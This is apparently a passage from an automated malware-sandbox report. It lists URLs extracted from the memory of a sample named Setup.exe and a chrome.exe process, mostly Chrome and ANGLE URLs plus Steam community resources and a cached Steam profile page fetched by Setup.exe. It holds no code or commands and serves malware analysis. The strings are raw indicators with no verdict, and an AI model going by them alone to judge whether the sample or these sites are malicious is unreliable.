      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5371
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5375
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5421
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5430
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5535
      Source: chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/55357
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543119025.0000650800474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5658
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543119025.0000650800474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5750
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5881
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5901
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/5906
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6041
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6048
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6141
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6248
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6439
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6651
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6692
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755
      Source: chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6755:
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6860
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6876
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6878
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6929
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/6953
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543119025.0000650800474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7036
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7047
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7172
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543119025.0000650800474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7279
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7370
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7406
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7488
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7553
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7556
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3541299980.000065080000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724
      Source: chrome.exe, 00000002.00000002.3541299980.000065080000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7724DM
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543721335.00006508005E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7760
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543119025.0000650800474000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/7761
      Source: chrome.exe, 00000002.00000003.1881350903.000065080037C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882002794.0000650800818000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1881922550.000065080037C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://anglebug.com/8162
      Source: chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search
      Source: chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
      Source: chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
      Source: Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
      Source: chrome.exe, 00000002.00000003.1883574094.0000650800CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888667895.0000650800F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1878438319.000065080048C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885769494.0000650800CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882698145.0000650800CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
      Source: chrome.exe, 00000002.00000002.3543923275.0000650800664000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore206E5
      Source: chrome.exe, 00000002.00000002.3545518029.00006508009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543923275.0000650800664000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3545709305.0000650800A1C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546706926.0000650800C34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
      Source: chrome.exe, 00000002.00000002.3545518029.00006508009D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=ene
      Source: chrome.exe, 00000002.00000003.1882369185.0000650800338000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1889942244.0000650800CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888644050.0000650800CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885908066.0000650800EB4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882630420.0000650800CE0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888797154.0000650800CF0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882396107.0000650800CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1883574094.0000650800CC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1888667895.0000650800F48000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1885769494.0000650800CF4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1882698145.0000650800CF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreLDDiscover
      Source: chrome.exe, 00000002.00000003.1875892751.00007DA0006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3557125995.00007DA000798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/
      Source: chrome.exe, 00000002.00000003.1875432554.00007DA000394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918142918.00007DA00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
      Source: chrome.exe, 00000002.00000003.1875892751.00007DA0006BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3557125995.00007DA000798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
      Source: chrome.exe, 00000002.00000003.1875432554.00007DA000394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918142918.00007DA00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
      Source: chrome.exe, 00000002.00000002.3557125995.00007DA000798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/KAnonymityServiceJoinRelayServerhttps://chromekanonym
      Source: chrome.exe, 00000002.00000003.1875835089.00007DA000690000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3557125995.00007DA000798000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
      Source: chrome.exe, 00000002.00000003.1875432554.00007DA000394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1916217396.000065080280C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1918142918.00007DA00080C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
      Source: chrome.exe, 00000002.00000002.3541299980.000065080000C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromewebstore.google.com/
      Source: chrome.exe, 00000002.00000002.3546786829.0000650800C58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromium-i18n.appspot.com/ssl-aggregate-address/
      Source: chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/
      Source: chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://classroom.googleapis.com/g1
      Source: chrome.exe, 00000002.00000003.1871997267.00004F38002E8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1871976350.00004F38002DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
      Source: chrome.exe, 00000002.00000002.3541299980.000065080000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3546527257.0000650800BB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543989032.0000650800684000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544367401.0000650800734000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3543561059.00006508005B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.1878438319.000065080048C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000002.3544227255.00006508006D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
      Source: chrome.exe, 00000002.00000002.3544470238.000065080074C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients3.google.com/cast/chromecast/home/wallpaper/image?rt=b
      Source: chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync
      Source: chrome.exe, 00000002.00000002.3542159544.00006508001C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients4.google.com/chrome-sync/event
      Source: chrome.exe, 00000002.00000002.3543854065.0000650800638000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
      Source: Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.
      Source: Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_c
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B52000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&a
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=eng
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&amp;l=englis
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/images/countryflags/us.gif
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
      Source: Setup.exe, 00000000.00000002.2769540945.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1830124954.0000000000BB3000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
      Source: Setup.exe, 00000000.00000003.1807701010.0000000000BAB000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807816623.0000000000B4B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1807701010.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, 76561199680660089[1].htm.0.drString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
